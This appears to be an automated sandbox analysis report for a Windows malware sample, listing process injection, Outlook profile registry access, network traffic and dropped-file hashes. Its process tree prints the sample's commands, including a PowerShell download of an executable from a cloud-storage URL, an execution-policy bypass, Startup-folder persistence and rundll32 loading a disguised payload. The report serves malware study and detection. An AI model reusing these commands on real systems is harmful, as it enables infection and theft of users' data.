PID 4324 wrote to memory of 4004 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 4512 wrote to memory of 2256 N/A C:\Users\Public\jsc.exe C:\Windows\SysWOW64\rundll32.exe
PID 4512 wrote to memory of 2256 N/A C:\Users\Public\jsc.exe C:\Windows\SysWOW64\rundll32.exe
PID 4512 wrote to memory of 2256 N/A C:\Users\Public\jsc.exe C:\Windows\SysWOW64\rundll32.exe
PID 2256 wrote to memory of 4924 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2256 wrote to memory of 4924 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2256 wrote to memory of 4924 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2256 wrote to memory of 1156 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2256 wrote to memory of 1156 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2256 wrote to memory of 1156 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2256 wrote to memory of 2008 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2256 wrote to memory of 2008 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2256 wrote to memory of 2008 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2256 wrote to memory of 4312 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2256 wrote to memory of 4312 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2256 wrote to memory of 4312 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2256 wrote to memory of 5004 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2256 wrote to memory of 5004 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2256 wrote to memory of 5004 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2256 wrote to memory of 3724 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2256 wrote to memory of 3724 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2256 wrote to memory of 3724 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2256 wrote to memory of 1832 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2256 wrote to memory of 1832 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2256 wrote to memory of 1832 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2256 wrote to memory of 864 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2256 wrote to memory of 864 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2256 wrote to memory of 864 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2256 wrote to memory of 2040 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2256 wrote to memory of 2040 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\rundll32.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\rundll32.exe N/A

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\c96a43db0abf02b0db8ca6efc658dc38.exe

"C:\Users\Admin\AppData\Local\Temp\c96a43db0abf02b0db8ca6efc658dc38.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Invoke-WebRequest -Uri "https://my.cloudme.com/v1/ws2/:slight-stood/:web_1/web" -OutFile "C:\Users\Public\Guard.exe""

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1"

C:\Users\Public\Guard.exe

"C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3

C:\Windows\SysWOW64\cmd.exe

cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\Admin\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit

C:\Users\Public\jsc.exe

C:\Users\Public\jsc.exe

C:\Users\Public\jsc.exe

"C:\Users\Public\jsc.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C wmic diskdrive where "DeviceID=\'c:\'" get SerialNumber /value

C:\Windows\SysWOW64\Wbem\WMIC.exe

wmic diskdrive where "DeviceID=\'c:\'" get SerialNumber /value

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\system32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\AdobeSFX.log",start

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4512 -ip 4512

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4512 -s 784

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61

Network

Country Destination Domain Proto
US 8.8.8.8:53 my.cloudme.com udp
SE 83.140.241.4:443 my.cloudme.com tcp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 4.241.140.83.in-addr.arpa udp
US 8.8.8.8:53 14.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
SE 83.140.241.4:443 my.cloudme.com tcp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs udp
US 8.8.8.8:53 212.20.149.52.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
FR 46.105.141.51:443 tcp
US 8.8.8.8:53 51.141.105.46.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
N/A 127.0.0.1:25462 tcp
N/A 127.0.0.1:25462 tcp
N/A 127.0.0.1:25462 tcp
N/A 127.0.0.1:25462 tcp
N/A 127.0.0.1:25462 tcp
N/A 127.0.0.1:25462 tcp
N/A 127.0.0.1:25466 tcp
N/A 127.0.0.1:25466 tcp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
N/A 127.0.0.1:25462 tcp
N/A 127.0.0.1:25462 tcp
N/A 127.0.0.1:25462 tcp
N/A 127.0.0.1:25462 tcp
FR 46.105.141.51:443 tcp
N/A 127.0.0.1:25462 tcp
N/A 127.0.0.1:25462 tcp
N/A 127.0.0.1:25462 tcp
N/A 127.0.0.1:25462 tcp
N/A 127.0.0.1:25462 tcp

Files

memory/2292-0-0x00007FFB52293000-0x00007FFB52295000-memory.dmp

memory/2292-1-0x00000291F95A0000-0x00000291F95C2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_j4fpf5no.m3f.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2292-11-0x00007FFB52290000-0x00007FFB52D51000-memory.dmp

memory/2292-12-0x00007FFB52290000-0x00007FFB52D51000-memory.dmp

memory/2292-16-0x00007FFB52290000-0x00007FFB52D51000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 2f57fde6b33e89a63cf0dfdd6e60a351
SHA1 445bf1b07223a04f8a159581a3d37d630273010f
SHA256 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA512 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

memory/3528-19-0x00007FFB52290000-0x00007FFB52D51000-memory.dmp

memory/3528-20-0x00007FFB52290000-0x00007FFB52D51000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 0f6a3762a04bbb03336fb66a040afb97
SHA1 0a0495c79f3c8f4cb349d82870ad9f98fbbaac74
SHA256 36e2fac0ab8aee32e193491c5d3df9374205e328a74de5648e7677eae7e1b383
SHA512 cc9ebc020ec18013f8ab4d6ca5a626d54db84f8dc2d97e538e33bb9a673344a670a2580346775012c85f204472f7f4dd25a34e59f1b827642a21db3325424b69

C:\Users\Public\PublicProfile.ps1

MD5 315eab1b113060397deb5d4013e64eae
SHA1 d1578170885d0375b2aa22954badaeb36a539026
SHA256 dae667196e8dc197c7e0a5ecb4718d26f8a8276c72cc190e14cdf8ed67b3b8c5
SHA512 f74b12217c36bac596bda9ac1d86d256a13591916774b795dbd1cf1525c90f93d0b9fe26b68f19a4dacb751d0b4f3649e9cf42a2fa0a1e916b9326fbe3c09ced

memory/3528-32-0x00007FFB52290000-0x00007FFB52D51000-memory.dmp

memory/3528-33-0x00007FFB52290000-0x00007FFB52D51000-memory.dmp

memory/3528-34-0x00007FFB52290000-0x00007FFB52D51000-memory.dmp

C:\Users\Public\Guard.exe

MD5 18ce19b57f43ce0a5af149c96aecc685
SHA1 1bd5ca29fc35fc8ac346f23b155337c5b28bbc36
SHA256 d8b7c7178fbadbf169294e4f29dce582f89a5cf372e9da9215aa082330dc12fd
SHA512 a0c58f04dfb49272a2b6f1e8ce3f541a030a6c7a09bb040e660fc4cd9892ca3ac39cf3d6754c125f7cd1987d1fca01640a153519b4e2eb3e3b4b8c9dc1480558

memory/3528-39-0x00007FFB52290000-0x00007FFB52D51000-memory.dmp

C:\Users\Public\Secure.au3

MD5 4bdd41d598fd897ce21bd86264030448
SHA1 2907df32a0b8fb017a0f5ba53605245cc0119c44
SHA256 daf4100279eaabf2c17b8e08026f4da4ebd817dc16d381b3daebe7adb9384c7c
SHA512 7d3895d6640566bac911c3638328fd794ffcc6fcf4ce365848f0e498df16b4a5c5659efd4fb4eacb51d3d9a394457f55b9f3ae1c530de99554728b94d57d531f

memory/2348-48-0x0000000000C00000-0x00000000010C2000-memory.dmp

C:\Users\Public\jsc.exe

MD5 94c8e57a80dfca2482dedb87b93d4fd9
SHA1 5729e6c7d2f5ab760f0093b9d44f8ac0f876a803
SHA256 39e87f0edcdd15582cfefdfab1975aadd2c7ca1e3a5f07b1146ce3206f401bb5
SHA512 1798a3607b2b94732b52de51d2748c86f9453343b6d8a417e98e65ddb38e9198cdcb2f45bf60823cb429b312466b28c5103c7588f2c4ef69fa27bfdb4f4c67dc

memory/2348-51-0x0000000006930000-0x0000000006DBE000-memory.dmp

memory/2348-52-0x0000000008010000-0x00000000084A0000-memory.dmp

memory/2348-53-0x0000000008A50000-0x0000000008FF4000-memory.dmp

memory/2348-54-0x00000000085A0000-0x0000000008632000-memory.dmp

memory/2348-68-0x0000000008010000-0x000000000849A000-memory.dmp

memory/2348-84-0x0000000008010000-0x000000000849A000-memory.dmp

memory/2348-112-0x0000000008010000-0x000000000849A000-memory.dmp

memory/2348-116-0x0000000008010000-0x000000000849A000-memory.dmp

memory/2348-114-0x0000000008010000-0x000000000849A000-memory.dmp

memory/2348-110-0x0000000008010000-0x000000000849A000-memory.dmp

memory/2348-108-0x0000000008010000-0x000000000849A000-memory.dmp

memory/2348-104-0x0000000008010000-0x000000000849A000-memory.dmp

memory/2348-102-0x0000000008010000-0x000000000849A000-memory.dmp

memory/2348-100-0x0000000008010000-0x000000000849A000-memory.dmp

memory/2348-106-0x0000000008010000-0x000000000849A000-memory.dmp

memory/2348-98-0x0000000008010000-0x000000000849A000-memory.dmp

memory/2348-96-0x0000000008010000-0x000000000849A000-memory.dmp

memory/2348-94-0x0000000008010000-0x000000000849A000-memory.dmp

memory/2348-92-0x0000000008010000-0x000000000849A000-memory.dmp

memory/2348-90-0x0000000008010000-0x000000000849A000-memory.dmp

memory/2348-88-0x0000000008010000-0x000000000849A000-memory.dmp

memory/2348-86-0x0000000008010000-0x000000000849A000-memory.dmp

memory/2348-82-0x0000000008010000-0x000000000849A000-memory.dmp

memory/2348-80-0x0000000008010000-0x000000000849A000-memory.dmp

memory/2348-78-0x0000000008010000-0x000000000849A000-memory.dmp

memory/2348-77-0x0000000008010000-0x000000000849A000-memory.dmp

memory/2348-74-0x0000000008010000-0x000000000849A000-memory.dmp

memory/2348-72-0x0000000008010000-0x000000000849A000-memory.dmp

memory/2348-70-0x0000000008010000-0x000000000849A000-memory.dmp

memory/2348-66-0x0000000008010000-0x000000000849A000-memory.dmp

memory/2348-62-0x0000000008010000-0x000000000849A000-memory.dmp

memory/2348-58-0x0000000008010000-0x000000000849A000-memory.dmp

memory/2348-56-0x0000000008010000-0x000000000849A000-memory.dmp

memory/2348-64-0x0000000008010000-0x000000000849A000-memory.dmp

memory/2348-60-0x0000000008010000-0x000000000849A000-memory.dmp

memory/2348-55-0x0000000008010000-0x000000000849A000-memory.dmp

memory/2348-1129-0x0000000005C90000-0x0000000006092000-memory.dmp

memory/2348-1130-0x0000000005940000-0x000000000598C000-memory.dmp

memory/2348-1134-0x00000000059A0000-0x00000000059F4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\AdobeSFX.log

MD5 7d96e2ae9f73e6b73fadaac62119c2a0
SHA1 f0e8de3ec0d6eb9cb90ac952288b6a9b423fbb76
SHA256 4ce7ab94060f74f36288dcce8ec72b65778183d99064660644834010f42b736b
SHA512 01b5a3d8ced0baa1bc3d4337831bfdebbdd98e6400061d828a29ea31c04c56d15ac1aa66a0e81c787491f0a8a542430fd2a39173a9a6ef446f04149da1df7666

C:\Users\Admin\AppData\Local\Temp\Rprwwhu

MD5 ab893875d697a3145af5eed5309bee26
SHA1 c90116149196cbf74ffb453ecb3b12945372ebfa
SHA256 02b1c2234680617802901a77eae606ad02e4ddb4282ccbc60061eac5b2d90bba
SHA512 6b65c0a1956ce18df2d271205f53274d2905c803d059a0801bf8331ccaa28a1d4842d3585dd9c2b01502a4be6664bde2e965b15fcfec981e85eed37c595cd6bc

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Temp\Wwhhdyy

MD5 3fa34a107d5efe90ec17732840469e71
SHA1 1ffdb7ba783ce75c0df96e7a5d7692c5d85fe9f2
SHA256 e82d233f53a5198db04fe3ade2f981acaced60e661614deb520bbdc4a76820f8
SHA512 bcbbc4971d94df8dd55977691d180a606869cf5fafae9e0c22453cec8de6ca208038815341ac9aaf41643ea4e767e1980cd02fdf6558404a555728614fd43fab

C:\Users\Admin\AppData\Local\Temp\Uptawafrya

MD5 49693267e0adbcd119f9f5e02adf3a80
SHA1 3ba3d7f89b8ad195ca82c92737e960e1f2b349df
SHA256 d76e7512e496b7c8d9fcd3010a55e2e566881dc6dacaf0343652a4915d47829f
SHA512 b4b9fcecf8d277bb0ccbb25e08f3559e3fc519d85d8761d8ad5bca983d04eb55a20d3b742b15b9b31a7c9187da40ad5c48baa7a54664cae4c40aa253165cbaa2